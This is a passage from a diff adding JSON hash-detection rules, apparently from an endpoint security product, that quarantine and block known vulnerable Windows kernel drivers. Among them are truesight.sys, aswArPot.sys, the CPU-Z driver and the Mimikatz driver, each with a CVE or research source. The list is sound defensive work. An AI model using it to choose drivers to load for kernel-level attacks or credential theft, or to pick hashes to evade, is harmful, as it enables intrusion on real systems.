+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ac341d36e1af8959de6410a976400ded8554f5ffb6a462a8080c38a0140f4d4",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1377f9e9-7926-50a3-8c26-b4a145a98ab8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818577Z",
+ "creation_date": "2026-03-23T11:45:30.818579Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6db7f2750e7438196ec906cc9eba540ef49ceca6dbd981038cef1dc50662a73",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "137fc969-2b90-5ac8-9203-7686497ae954",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488586Z",
+ "creation_date": "2026-03-23T11:45:31.488588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5623f7e0ee46d7b957b837cca853cba4ccbd91c9ef614a063aa731f87f36c370",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1381530d-1548-583e-9b8f-6688a7a70576",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155327Z",
+ "creation_date": "2026-03-23T11:45:31.155329Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb7d84d567204a528cafc729897d3a6a2ebcceb6cca287c585335069deee24c5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13917c01-d5fc-5581-9056-fece2e3731e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148078Z",
+ "creation_date": "2026-03-23T11:45:31.148080Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce44334bec3fe07364bae329eaccf6d39124b7d5ef1485f596b1b1c94f4f182d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1396e8d3-1fa5-5fcc-9c12-d3f24d2d5216",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611464Z",
+ "creation_date": "2026-03-23T11:45:29.611466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611471Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02fcbc5372c9bf31903376bde11d558ab7c7f13bde005120e24bdb1aef5d0134",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13a5ba2c-788b-58b1-bfea-7fbf4ecad650",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983902Z",
+ "creation_date": "2026-03-23T11:45:29.983904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097",
+ "comment": "Vulnerable Kernel Driver (aka iomem64.sys) [https://www.loldrivers.io/drivers/04d377f9-36e0-42a4-8d47-62232163dc68/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13ad4e8d-4f6e-5cdf-aec9-5d5c764563b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827630Z",
+ "creation_date": "2026-03-23T11:45:30.827632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827637Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c357ccc50a8511019d0beb93a910bdc3ea7ca5048e41f4f6cfca83cdd53aad9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13ae6c2e-50e5-5735-b522-9f33e0a477bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970547Z",
+ "creation_date": "2026-03-23T11:45:29.970549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0931e16cf7b18d15579e36e0a69edad1717b07527b5407f2c105a2f554224b2",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13befc9e-fa56-5455-9497-1484c9a473bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827255Z",
+ "creation_date": "2026-03-23T11:45:30.827257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5472de65d2797e341862f32e40c7e6bc71f0c481a3b7dfc3198b490d7d7427fb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13c075fb-5eac-503e-bf72-3780ce4ad39c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621089Z",
+ "creation_date": "2026-03-23T11:45:29.621091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13c236a2-a836-530b-82fa-28adad19b6b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154058Z",
+ "creation_date": "2026-03-23T11:45:31.154060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39088113e8638c131fe41496671223fcc3c8e08e1a1adc2e48b38b61d3712c19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13c6a3cb-2d76-5376-bc4e-9bf8600c5eb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474961Z",
+ "creation_date": "2026-03-23T11:45:31.474965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e07521d559535a1ff648828c885d426cca5fa2b92d6ca2637d985a8fc8b5454d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13cd0717-534a-50ac-9363-23f9d830eca5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826973Z",
+ "creation_date": "2026-03-23T11:45:31.826975Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826981Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad9147b40c939210c0c4ee4f0127a7cb5ef3d6b768835f5be24cc178c8505a40",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13cef623-5e33-5bfc-bfa0-2d7467f59ff6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970037Z",
+ "creation_date": "2026-03-23T11:45:29.970039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a465cfa7a0bd76dfe8f261661d348e25d1a6a3975673336f90878618f2e6c21b",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13d71092-fe88-52d5-a1b0-2d5476d6506a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614683Z",
+ "creation_date": "2026-03-23T11:45:29.614685Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614690Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13d759f3-a0d4-529f-b2c3-36fc61e6ddd1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456423Z",
+ "creation_date": "2026-03-23T11:45:30.456426Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456435Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e41d4fd99252fcf9aea529b6e148b311aa26a4ab04f6b79cce4cd19c61db0c87",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13d900e8-b51b-5904-a13f-c1e52b3a623e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159140Z",
+ "creation_date": "2026-03-23T11:45:31.159142Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159148Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6496601ffcf0b20318e0b30958b8d2034604884c8e4f418c1262e31637bff6d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13e02b56-cce9-5d64-9bc8-58d126ff8b1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456694Z",
+ "creation_date": "2026-03-23T11:45:30.456697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a92d2736c8cd99195a1ef4d0d9a3412bee481acf585944e3b5946b465361a3e7",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13ed4d8b-d4b7-560a-8efb-1d38a806cdb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977333Z",
+ "creation_date": "2026-03-23T11:45:29.977336Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977344Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13f2af91-cd0f-59c0-a9cf-e37ff2460399",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150176Z",
+ "creation_date": "2026-03-23T11:45:31.150178Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150184Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23641b9366567f6f8543853b84d8c97d818d848b056e776bb1cafcfecd22bc05",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1403247d-f2d5-5609-b5cb-26c195da03cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613928Z",
+ "creation_date": "2026-03-23T11:45:29.613930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3de51a3102db7297d96b4de5b60aca5f3a07e8577bbbed7f755f1de9a9c38e75",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "140d8201-8d8d-582f-9aff-25aafe5b9440",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606008Z",
+ "creation_date": "2026-03-23T11:45:29.606009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606015Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b00d6e5d40b1b84ca63da0e99246574cdd2a533122bc83746f06c0d66e63a6e",
